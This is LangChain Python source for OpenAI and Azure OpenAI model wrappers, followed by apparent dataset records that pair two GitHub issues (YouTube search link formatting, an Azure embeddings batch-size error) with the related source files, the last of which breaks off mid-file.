from __future__ import annotations import logging import sys import warnings from typing import ( AbstractSet, Any, AsyncIterator, Callable, Collection, Dict, Iterator, List, Literal, Mapping, Optional, Set, Tuple, Union, ) from langchain.callbacks.manager import ( AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun, ) from langchain.llms.base import BaseLLM, create_base_retry_decorator from langchain.pydantic_v1 import Field, root_validator from langchain.schema import Generation, LLMResult from langchain.schema.output import GenerationChunk from langchain.utils import get_from_dict_or_env, get_pydantic_field_names from langchain.utils.utils import build_extra_kwargs logger = logging.getLogger(__name__) def update_token_usage( keys: Set[str], response: Dict[str, Any], token_usage: Dict[str, Any] ) -> None: """Update token usage.""" _keys_to_use = keys.intersection(response["usage"]) for _key in _keys_to_use: if _key not in token_usage: token_usage[_key] = response["usage"][_key] else: token_usage[_key] += response["usage"][_key] def _stream_response_to_generation_chunk( stream_response: Dict[str, Any], ) -> GenerationChunk: """Convert a stream response to a generation chunk.""" return GenerationChunk( text=stream_response["choices"][0]["text"], generation_info=dict( finish_reason=stream_response["choices"][0].get("finish_reason", None), logprobs=stream_response["choices"][0].get("logprobs", None), ), ) def _update_response(response: Dict[str, Any], stream_response: Dict[str, Any]) -> None: """Update response from the stream response.""" response["choices"][0]["text"] += stream_response["choices"][0]["text"] response["choices"][0]["finish_reason"] = stream_response["choices"][0].get( "finish_reason", None ) response["choices"][0]["logprobs"] = stream_response["choices"][0]["logprobs"] def _streaming_response_template() -> Dict[str, Any]: return { "choices": [ { "text": "", "finish_reason": None, "logprobs": None, } ] } def _create_retry_decorator( llm: Union[BaseOpenAI, OpenAIChat], run_manager: Optional[ Union[AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun] ] = None, ) -> Callable[[Any], Any]: import openai errors = [ openai.error.Timeout, openai.error.APIError, openai.error.APIConnectionError, openai.error.RateLimitError, openai.error.ServiceUnavailableError, ] return create_base_retry_decorator( error_types=errors, max_retries=llm.max_retries, run_manager=run_manager ) def completion_with_retry( llm: Union[BaseOpenAI, OpenAIChat], run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> Any: """Use tenacity to retry the completion call.""" retry_decorator = _create_retry_decorator(llm, run_manager=run_manager) @retry_decorator def _completion_with_retry(**kwargs: Any) -> Any: return llm.client.create(**kwargs) return _completion_with_retry(**kwargs) async def acompletion_with_retry( llm: Union[BaseOpenAI, OpenAIChat], run_manager: Optional[AsyncCallbackManagerForLLMRun] = None, **kwargs: Any, ) -> Any: """Use tenacity to retry the async completion call.""" retry_decorator = _create_retry_decorator(llm, run_manager=run_manager) @retry_decorator async def _completion_with_retry(**kwargs: Any) -> Any: # Use OpenAI's async api https://github.com/openai/openai-python#async-api return await llm.client.acreate(**kwargs) return await _completion_with_retry(**kwargs) class BaseOpenAI(BaseLLM): """Base OpenAI large language model class.""" @property def lc_secrets(self) -> Dict[str, str]: return {"openai_api_key": "OPENAI_API_KEY"} @property def lc_serializable(self) -> bool: return True client: Any = None #: :meta private: model_name: str = Field(default="text-davinci-003", alias="model") """Model name to use.""" temperature: float = 0.7 """What sampling temperature to use.""" max_tokens: int = 256 """The maximum number of tokens to generate in the completion. -1 returns as many tokens as possible given the prompt and the models maximal context size.""" top_p: float = 1 """Total probability mass of tokens to consider at each step.""" frequency_penalty: float = 0 """Penalizes repeated tokens according to frequency.""" presence_penalty: float = 0 """Penalizes repeated tokens.""" n: int = 1 """How many completions to generate for each prompt.""" best_of: int = 1 """Generates best_of completions server-side and returns the "best".""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" openai_api_key: Optional[str] = None openai_api_base: Optional[str] = None openai_organization: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None batch_size: int = 20 """Batch size to use when passing multiple documents to generate.""" request_timeout: Optional[Union[float, Tuple[float, float]]] = None """Timeout for requests to OpenAI completion API. Default is 600 seconds.""" logit_bias: Optional[Dict[str, float]] = Field(default_factory=dict) """Adjust the probability of specific tokens being generated.""" max_retries: int = 6 """Maximum number of retries to make when generating.""" streaming: bool = False """Whether to stream the results or not.""" allowed_special: Union[Literal["all"], AbstractSet[str]] = set() """Set of special tokens that are allowed。""" disallowed_special: Union[Literal["all"], Collection[str]] = "all" """Set of special tokens that are not allowed。""" tiktoken_model_name: Optional[str] = None """The model name to pass to tiktoken when using this class. Tiktoken is used to count the number of tokens in documents to constrain them to be under a certain limit. By default, when set to None, this will be the same as the embedding model name. However, there are some cases where you may want to use this Embedding class with a model name not supported by tiktoken. This can include when using Azure embeddings or when using one of the many model providers that expose an OpenAI-like API but with different models. In those cases, in order to avoid erroring when tiktoken is called, you can specify a model name to use here.""" def __new__(cls, **data: Any) -> Union[OpenAIChat, BaseOpenAI]: # type: ignore """Initialize the OpenAI object.""" model_name = data.get("model_name", "") if ( model_name.startswith("gpt-3.5-turbo") or model_name.startswith("gpt-4") ) and "-instruct" not in model_name: warnings.warn( "You are trying to use a chat model. This way of initializing it is " "no longer supported. Instead, please use: " "`from langchain.chat_models import ChatOpenAI`" ) return OpenAIChat(**data) return super().__new__(cls) class Config: """Configuration for this pydantic object.""" allow_population_by_field_name = True @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = get_pydantic_field_names(cls) extra = values.get("model_kwargs", {}) values["model_kwargs"] = build_extra_kwargs( extra, values, all_required_field_names ) return values @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) try: import openai values["client"] = openai.Completion except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) if values["streaming"] and values["n"] > 1: raise ValueError("Cannot stream results when n > 1.") if values["streaming"] and values["best_of"] > 1: raise ValueError("Cannot stream results when best_of > 1.") return values @property def _default_params(self) -> Dict[str, Any]: """Get the default parameters for calling OpenAI API.""" normal_params = { "temperature": self.temperature, "max_tokens": self.max_tokens, "top_p": self.top_p, "frequency_penalty": self.frequency_penalty, "presence_penalty": self.presence_penalty, "n": self.n, "request_timeout": self.request_timeout, "logit_bias": self.logit_bias, } # Azure gpt-35-turbo doesn't support best_of # don't specify best_of if it is 1 if self.best_of > 1: normal_params["best_of"] = self.best_of return {**normal_params, **self.model_kwargs} def _stream( self, prompt: str, stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> Iterator[GenerationChunk]: params = {**self._invocation_params, **kwargs, "stream": True} self.get_sub_prompts(params, [prompt], stop) # this mutates params for stream_resp in completion_with_retry( self, prompt=prompt, run_manager=run_manager, **params ): chunk = _stream_response_to_generation_chunk(stream_resp) yield chunk if run_manager: run_manager.on_llm_new_token( chunk.text, chunk=chunk, verbose=self.verbose, logprobs=chunk.generation_info["logprobs"] if chunk.generation_info else None, ) async def _astream( self, prompt: str, stop: Optional[List[str]] = None, run_manager: Optional[AsyncCallbackManagerForLLMRun] = None, **kwargs: Any, ) -> AsyncIterator[GenerationChunk]: params = {**self._invocation_params, **kwargs, "stream": True} self.get_sub_prompts(params, [prompt], stop) # this mutate params async for stream_resp in await acompletion_with_retry( self, prompt=prompt, run_manager=run_manager, **params ): chunk = _stream_response_to_generation_chunk(stream_resp) yield chunk if run_manager: await run_manager.on_llm_new_token( chunk.text, chunk=chunk, verbose=self.verbose, logprobs=chunk.generation_info["logprobs"] if chunk.generation_info else None, ) def _generate( self, prompts: List[str], stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> LLMResult: """Call out to OpenAI's endpoint with k unique prompts. Args: prompts: The prompts to pass into the model. stop: Optional list of stop words to use when generating. Returns: The full LLM output. Example: .. code-block:: python response = openai.generate(["Tell me a joke."]) """ # TODO: write a unit test for this params = self._invocation_params params = {**params, **kwargs} sub_prompts = self.get_sub_prompts(params, prompts, stop) choices = [] token_usage: Dict[str, int] = {} # Get the token usage from the response. # Includes prompt, completion, and total tokens used. _keys = {"completion_tokens", "prompt_tokens", "total_tokens"} for _prompts in sub_prompts: if self.streaming: if len(_prompts) > 1: raise ValueError("Cannot stream results with multiple prompts.") generation: Optional[GenerationChunk] = None for chunk in self._stream(_prompts[0], stop, run_manager, **kwargs): if generation is None: generation = chunk else: generation += chunk assert generation is not None choices.append( { "text": generation.text, "finish_reason": generation.generation_info.get("finish_reason") if generation.generation_info else None, "logprobs": generation.generation_info.get("logprobs") if generation.generation_info else None, } ) else: response = completion_with_retry( self, prompt=_prompts, run_manager=run_manager, **params ) choices.extend(response["choices"]) update_token_usage(_keys, response, token_usage) return self.create_llm_result(choices, prompts, token_usage) async def _agenerate( self, prompts: List[str], stop: Optional[List[str]] = None, run_manager: Optional[AsyncCallbackManagerForLLMRun] = None, **kwargs: Any, ) -> LLMResult: """Call out to OpenAI's endpoint async with k unique prompts.""" params = self._invocation_params params = {**params, **kwargs} sub_prompts = self.get_sub_prompts(params, prompts, stop) choices = [] token_usage: Dict[str, int] = {} # Get the token usage from the response. # Includes prompt, completion, and total tokens used. _keys = {"completion_tokens", "prompt_tokens", "total_tokens"} for _prompts in sub_prompts: if self.streaming: if len(_prompts) > 1: raise ValueError("Cannot stream results with multiple prompts.") generation: Optional[GenerationChunk] = None async for chunk in self._astream( _prompts[0], stop, run_manager, **kwargs ): if generation is None: generation = chunk else: generation += chunk assert generation is not None choices.append( { "text": generation.text, "finish_reason": generation.generation_info.get("finish_reason") if generation.generation_info else None, "logprobs": generation.generation_info.get("logprobs") if generation.generation_info else None, } ) else: response = await acompletion_with_retry( self, prompt=_prompts, run_manager=run_manager, **params ) choices.extend(response["choices"]) update_token_usage(_keys, response, token_usage) return self.create_llm_result(choices, prompts, token_usage) def get_sub_prompts( self, params: Dict[str, Any], prompts: List[str], stop: Optional[List[str]] = None, ) -> List[List[str]]: """Get the sub prompts for llm call.""" if stop is not None: if "stop" in params: raise ValueError("`stop` found in both the input and default params.") params["stop"] = stop if params["max_tokens"] == -1: if len(prompts) != 1: raise ValueError( "max_tokens set to -1 not supported for multiple inputs." ) params["max_tokens"] = self.max_tokens_for_prompt(prompts[0]) sub_prompts = [ prompts[i : i + self.batch_size] for i in range(0, len(prompts), self.batch_size) ] return sub_prompts def create_llm_result( self, choices: Any, prompts: List[str], token_usage: Dict[str, int] ) -> LLMResult: """Create the LLMResult from the choices and prompts.""" generations = [] for i, _ in enumerate(prompts): sub_choices = choices[i * self.n : (i + 1) * self.n] generations.append( [ Generation( text=choice["text"], generation_info=dict( finish_reason=choice.get("finish_reason"), logprobs=choice.get("logprobs"), ), ) for choice in sub_choices ] ) llm_output = {"token_usage": token_usage, "model_name": self.model_name} return LLMResult(generations=generations, llm_output=llm_output) @property def _invocation_params(self) -> Dict[str, Any]: """Get the parameters used to invoke the model.""" openai_creds: Dict[str, Any] = { "api_key": self.openai_api_key, "api_base": self.openai_api_base, "organization": self.openai_organization, } if self.openai_proxy: import openai openai.proxy = {"http": self.openai_proxy, "https": self.openai_proxy} # type: ignore[assignment] # noqa: E501 return {**openai_creds, **self._default_params} @property def _identifying_params(self) -> Mapping[str, Any]: """Get the identifying parameters.""" return {**{"model_name": self.model_name}, **self._default_params} @property def _llm_type(self) -> str: """Return type of llm.""" return "openai" def get_token_ids(self, text: str) -> List[int]: """Get the token IDs using the tiktoken package.""" # tiktoken NOT supported for Python < 3.8 if sys.version_info[1] < 8: return super().get_num_tokens(text) try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to calculate get_num_tokens. " "Please install it with `pip install tiktoken`." ) model_name = self.tiktoken_model_name or self.model_name try: enc = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" enc = tiktoken.get_encoding(model) return enc.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) @staticmethod def modelname_to_contextsize(modelname: str) -> int: """Calculate the maximum number of tokens possible to generate for a model. Args: modelname: The modelname we want to know the context size for. Returns: The maximum context size Example: .. code-block:: python max_tokens = openai.modelname_to_contextsize("text-davinci-003") """ model_token_mapping = { "gpt-4": 8192, "gpt-4-0314": 8192, "gpt-4-0613": 8192, "gpt-4-32k": 32768, "gpt-4-32k-0314": 32768, "gpt-4-32k-0613": 32768, "gpt-3.5-turbo": 4096, "gpt-3.5-turbo-0301": 4096, "gpt-3.5-turbo-0613": 4096, "gpt-3.5-turbo-16k": 16385, "gpt-3.5-turbo-16k-0613": 16385, "text-ada-001": 2049, "ada": 2049, "text-babbage-001": 2040, "babbage": 2049, "text-curie-001": 2049, "curie": 2049, "davinci": 2049, "text-davinci-003": 4097, "text-davinci-002": 4097, "code-davinci-002": 8001, "code-davinci-001": 8001, "code-cushman-002": 2048, "code-cushman-001": 2048, } # handling finetuned models if "ft-" in modelname: modelname = modelname.split(":")[0] context_size = model_token_mapping.get(modelname, None) if context_size is None: raise ValueError( f"Unknown model: {modelname}. Please provide a valid OpenAI model name." "Known models are: " + ", ".join(model_token_mapping.keys()) ) return context_size @property def max_context_size(self) -> int: """Get max context size for this model.""" return self.modelname_to_contextsize(self.model_name) def max_tokens_for_prompt(self, prompt: str) -> int: """Calculate the maximum number of tokens possible to generate for a prompt. Args: prompt: The prompt to pass into the model. Returns: The maximum number of tokens to generate for a prompt. Example: .. code-block:: python max_tokens = openai.max_token_for_prompt("Tell me a joke.") """ num_tokens = self.get_num_tokens(prompt) return self.max_context_size - num_tokens class OpenAI(BaseOpenAI): """OpenAI large language models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key. Any parameters that are valid to be passed to the openai.create call can be passed in, even if not explicitly saved on this class. Example: .. code-block:: python from langchain.llms import OpenAI openai = OpenAI(model_name="text-davinci-003") """ @property def _invocation_params(self) -> Dict[str, Any]: return {**{"model": self.model_name}, **super()._invocation_params} class AzureOpenAI(BaseOpenAI): """Azure-specific OpenAI large language models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key. Any parameters that are valid to be passed to the openai.create call can be passed in, even if not explicitly saved on this class. Example: .. code-block:: python from langchain.llms import AzureOpenAI openai = AzureOpenAI(model_name="text-davinci-003") """ deployment_name: str = "" """Deployment name to use.""" openai_api_type: str = "" openai_api_version: str = "" @root_validator() def validate_azure_settings(cls, values: Dict) -> Dict: values["openai_api_version"] = get_from_dict_or_env( values, "openai_api_version", "OPENAI_API_VERSION", ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", "azure" ) return values @property def _identifying_params(self) -> Mapping[str, Any]: return { **{"deployment_name": self.deployment_name}, **super()._identifying_params, } @property def _invocation_params(self) -> Dict[str, Any]: openai_params = { "engine": self.deployment_name, "api_type": self.openai_api_type, "api_version": self.openai_api_version, } return {**openai_params, **super()._invocation_params} @property def _llm_type(self) -> str: """Return type of llm.""" return "azure" class OpenAIChat(BaseLLM): """OpenAI Chat large language models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key. Any parameters that are valid to be passed to the openai.create call can be passed in, even if not explicitly saved on this class. Example: .. code-block:: python from langchain.llms import OpenAIChat openaichat = OpenAIChat(model_name="gpt-3.5-turbo") """ client: Any #: :meta private: model_name: str = "gpt-3.5-turbo" """Model name to use.""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" openai_api_key: Optional[str] = None openai_api_base: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None max_retries: int = 6 """Maximum number of retries to make when generating.""" prefix_messages: List = Field(default_factory=list) """Series of messages for Chat input.""" streaming: bool = False """Whether to stream the results or not.""" allowed_special: Union[Literal["all"], AbstractSet[str]] = set() """Set of special tokens that are allowed。""" disallowed_special: Union[Literal["all"], Collection[str]] = "all" """Set of special tokens that are not allowed。""" @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = {field.alias for field in cls.__fields__.values()} extra = values.get("model_kwargs", {}) for field_name in list(values): if field_name not in all_required_field_names: if field_name in extra: raise ValueError(f"Found {field_name} supplied twice.") extra[field_name] = values.pop(field_name) values["model_kwargs"] = extra return values @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" openai_api_key = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) openai_api_base = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", default="", ) openai_proxy = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) openai_organization = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="" ) try: import openai openai.api_key = openai_api_key if openai_api_base: openai.api_base = openai_api_base if openai_organization: openai.organization = openai_organization if openai_proxy: openai.proxy = {"http": openai_proxy, "https": openai_proxy} # type: ignore[assignment] # noqa: E501 except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) try: values["client"] = openai.ChatCompletion except AttributeError: raise ValueError( "`openai` has no `ChatCompletion` attribute, this is likely " "due to an old version of the openai package. Try upgrading it " "with `pip install --upgrade openai`." ) warnings.warn( "You are trying to use a chat model. This way of initializing it is " "no longer supported. Instead, please use: " "`from langchain.chat_models import ChatOpenAI`" ) return values @property def _default_params(self) -> Dict[str, Any]: """Get the default parameters for calling OpenAI API.""" return self.model_kwargs def _get_chat_params( self, prompts: List[str], stop: Optional[List[str]] = None ) -> Tuple: if len(prompts) > 1: raise ValueError( f"OpenAIChat currently only supports single prompt, got {prompts}" ) messages = self.prefix_messages + [{"role": "user", "content": prompts[0]}] params: Dict[str, Any] = {**{"model": self.model_name}, **self._default_params} if stop is not None: if "stop" in params: raise ValueError("`stop` found in both the input and default params.") params["stop"] = stop if params.get("max_tokens") == -1: # for ChatGPT api, omitting max_tokens is equivalent to having no limit del params["max_tokens"] return messages, params def _stream( self, prompt: str, stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> Iterator[GenerationChunk]: messages, params = self._get_chat_params([prompt], stop) params = {**params, **kwargs, "stream": True} for stream_resp in completion_with_retry( self, messages=messages, run_manager=run_manager, **params ): token = stream_resp["choices"][0]["delta"].get("content", "") chunk = GenerationChunk(text=token) yield chunk if run_manager: run_manager.on_llm_new_token(token, chunk=chunk) async def _astream( self, prompt: str, stop: Optional[List[str]] = None, run_manager: Optional[AsyncCallbackManagerForLLMRun] = None, **kwargs: Any, ) -> AsyncIterator[GenerationChunk]: messages, params = self._get_chat_params([prompt], stop) params = {**params, **kwargs, "stream": True} async for stream_resp in await acompletion_with_retry( self, messages=messages, run_manager=run_manager, **params ): token = stream_resp["choices"][0]["delta"].get("content", "") chunk = GenerationChunk(text=token) yield chunk if run_manager: await run_manager.on_llm_new_token(token, chunk=chunk) def _generate( self, prompts: List[str], stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> LLMResult: if self.streaming: generation: Optional[GenerationChunk] = None for chunk in self._stream(prompts[0], stop, run_manager, **kwargs): if generation is None: generation = chunk else: generation += chunk assert generation is not None return LLMResult(generations=[[generation]]) messages, params = self._get_chat_params(prompts, stop) params = {**params, **kwargs} full_response = completion_with_retry( self, messages=messages, run_manager=run_manager, **params ) llm_output = { "token_usage": full_response["usage"], "model_name": self.model_name, } return LLMResult( generations=[ [Generation(text=full_response["choices"][0]["message"]["content"])] ], llm_output=llm_output, ) async def _agenerate( self, prompts: List[str], stop: Optional[List[str]] = None, run_manager: Optional[AsyncCallbackManagerForLLMRun] = None, **kwargs: Any, ) -> LLMResult: if self.streaming: generation: Optional[GenerationChunk] = None async for chunk in self._astream(prompts[0], stop, run_manager, **kwargs): if generation is None: generation = chunk else: generation += chunk assert generation is not None return LLMResult(generations=[[generation]]) messages, params = self._get_chat_params(prompts, stop) params = {**params, **kwargs} full_response = await acompletion_with_retry( self, messages=messages, run_manager=run_manager, **params ) llm_output = { "token_usage": full_response["usage"], "model_name": self.model_name, } return LLMResult( generations=[ [Generation(text=full_response["choices"][0]["message"]["content"])] ], llm_output=llm_output, ) @property def _identifying_params(self) -> Mapping[str, Any]: """Get the identifying parameters.""" return {**{"model_name": self.model_name}, **self._default_params} @property def _llm_type(self) -> str: """Return type of llm.""" return "openai-chat" def get_token_ids(self, text: str) -> List[int]: """Get the token IDs using the tiktoken package.""" # tiktoken NOT supported for Python < 3.8 if sys.version_info[1] < 8: return super().get_token_ids(text) try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to calculate get_num_tokens. " "Please install it with `pip install tiktoken`." ) enc = tiktoken.encoding_for_model(self.model_name) return enc.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,742
Update return parameter of YouTubeSearchTool
### Feature request Return the Youtube video links in full format like `https://www.youtube.com/watch?v=VIDEO_ID` Currently the links are like `/watch?v=VIDEO_ID` Return the links as List like `['link1, 'link2']` Currently it is returning the whole list as string ` "['link1, 'link2']" ` ### Motivation If the links returned are exact same as **direct links to youtube in a list** rather than a string, i can avoid the hustle and bustle of processing it agian to convert to the required format ### Your contribution I will change the code a bit and pull it.
https://github.com/langchain-ai/langchain/issues/10742
https://github.com/langchain-ai/langchain/pull/10743
1dae3c383ed17b0a2e4675accf396bc73834de75
740eafe41da7317f42387bdfe6d0f1f521f2cafd
"2023-09-18T17:47:53Z"
python
"2023-09-20T00:04:06Z"
libs/langchain/langchain/tools/youtube/search.py
""" Adapted from https://github.com/venuv/langchain_yt_tools CustomYTSearchTool searches YouTube videos related to a person and returns a specified number of video URLs. Input to this tool should be a comma separated list, - the first part contains a person name - and the second(optional) a number that is the maximum number of video results to return """ import json from typing import Optional from langchain.callbacks.manager import CallbackManagerForToolRun from langchain.tools import BaseTool class YouTubeSearchTool(BaseTool): """Tool that queries YouTube.""" name: str = "youtube_search" description: str = ( "search for youtube videos associated with a person. " "the input to this tool should be a comma separated list, " "the first part contains a person name and the second a " "number that is the maximum number of video results " "to return aka num_results. the second part is optional" ) def _search(self, person: str, num_results: int) -> str: from youtube_search import YoutubeSearch results = YoutubeSearch(person, num_results).to_json() data = json.loads(results) url_suffix_list = [video["url_suffix"] for video in data["videos"]] return str(url_suffix_list) def _run( self, query: str, run_manager: Optional[CallbackManagerForToolRun] = None, ) -> str: """Use the tool.""" values = query.split(",") person = values[0] if len(values) > 1: num_results = int(values[1]) else: num_results = 2 return self._search(person, num_results)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,575
AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1.
### System Info Langchain version == 0.0.166 Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2 LLM = AzureOpenAI ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce: 1. Set up azure openai embeddings by providing key, version etc.. 2. Load a document with a loader 3. Set up a text splitter so you get more then 2 documents 4. add them to chromadb with `.add_documents(List<Document>)` This is some example code: ```py pdf = PyPDFLoader(url) documents = pdf.load() text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0) texts = text_splitter.split_documents(documents) vectordb.add_documents(texts) vectordb.persist() ``` ### Expected behavior Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.` This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once. The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214 The input should be a 1 dimentional array and not multi.
https://github.com/langchain-ai/langchain/issues/4575
https://github.com/langchain-ai/langchain/pull/10707
7395c2845549f77a3b52d9d7f0d70c88bed5817a
f0198354d93e7ba8b615b8fd845223c88ea4ed2b
"2023-05-12T12:38:50Z"
python
"2023-09-20T04:50:39Z"
libs/langchain/langchain/embeddings/openai.py
from __future__ import annotations import logging import warnings from typing import ( Any, Callable, Dict, List, Literal, Optional, Sequence, Set, Tuple, Union, ) import numpy as np from tenacity import ( AsyncRetrying, before_sleep_log, retry, retry_if_exception_type, stop_after_attempt, wait_exponential, ) from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator from langchain.schema.embeddings import Embeddings from langchain.utils import get_from_dict_or_env, get_pydantic_field_names logger = logging.getLogger(__name__) def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards return retry( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards async_retrying = AsyncRetrying( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def wrap(func: Callable) -> Callable: async def wrapped_f(*args: Any, **kwargs: Any) -> Callable: async for _ in async_retrying: return await func(*args, **kwargs) raise AssertionError("this is unreachable") return wrapped_f return wrap # https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings def _check_response(response: dict, skip_empty: bool = False) -> dict: if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty: import openai raise openai.error.APIError("OpenAI API returned an empty embedding") return response def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" retry_decorator = _create_retry_decorator(embeddings) @retry_decorator def _embed_with_retry(**kwargs: Any) -> Any: response = embeddings.client.create(**kwargs) return _check_response(response, skip_empty=embeddings.skip_empty) return _embed_with_retry(**kwargs) async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" @_async_retry_decorator(embeddings) async def _async_embed_with_retry(**kwargs: Any) -> Any: response = await embeddings.client.acreate(**kwargs) return _check_response(response, skip_empty=embeddings.skip_empty) return await _async_embed_with_retry(**kwargs) class OpenAIEmbeddings(BaseModel, Embeddings): """OpenAI embedding models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key or pass it as a named parameter to the constructor. Example: .. code-block:: python from langchain.embeddings import OpenAIEmbeddings openai = OpenAIEmbeddings(openai_api_key="my-api-key") In order to use the library with Microsoft Azure endpoints, you need to set the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION. The OPENAI_API_TYPE must be set to 'azure' and the others correspond to the properties of your endpoint. In addition, the deployment name must be passed as the model parameter. Example: .. code-block:: python import os os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/" os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key" os.environ["OPENAI_API_VERSION"] = "2023-05-15" os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080" from langchain.embeddings.openai import OpenAIEmbeddings embeddings = OpenAIEmbeddings( deployment="your-embeddings-deployment-name", model="your-embeddings-model-name", openai_api_base="https://your-endpoint.openai.azure.com/", openai_api_type="azure", ) text = "This is a test query." query_result = embeddings.embed_query(text) """ client: Any = None #: :meta private: model: str = "text-embedding-ada-002" deployment: str = model # to support Azure OpenAI Service custom deployment names openai_api_version: Optional[str] = None # to support Azure OpenAI Service custom endpoints openai_api_base: Optional[str] = None # to support Azure OpenAI Service custom endpoints openai_api_type: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None embedding_ctx_length: int = 8191 """The maximum number of tokens to embed at once.""" openai_api_key: Optional[str] = None openai_organization: Optional[str] = None allowed_special: Union[Literal["all"], Set[str]] = set() disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all" chunk_size: int = 1000 """Maximum number of texts to embed in each batch""" max_retries: int = 6 """Maximum number of retries to make when generating.""" request_timeout: Optional[Union[float, Tuple[float, float]]] = None """Timeout in seconds for the 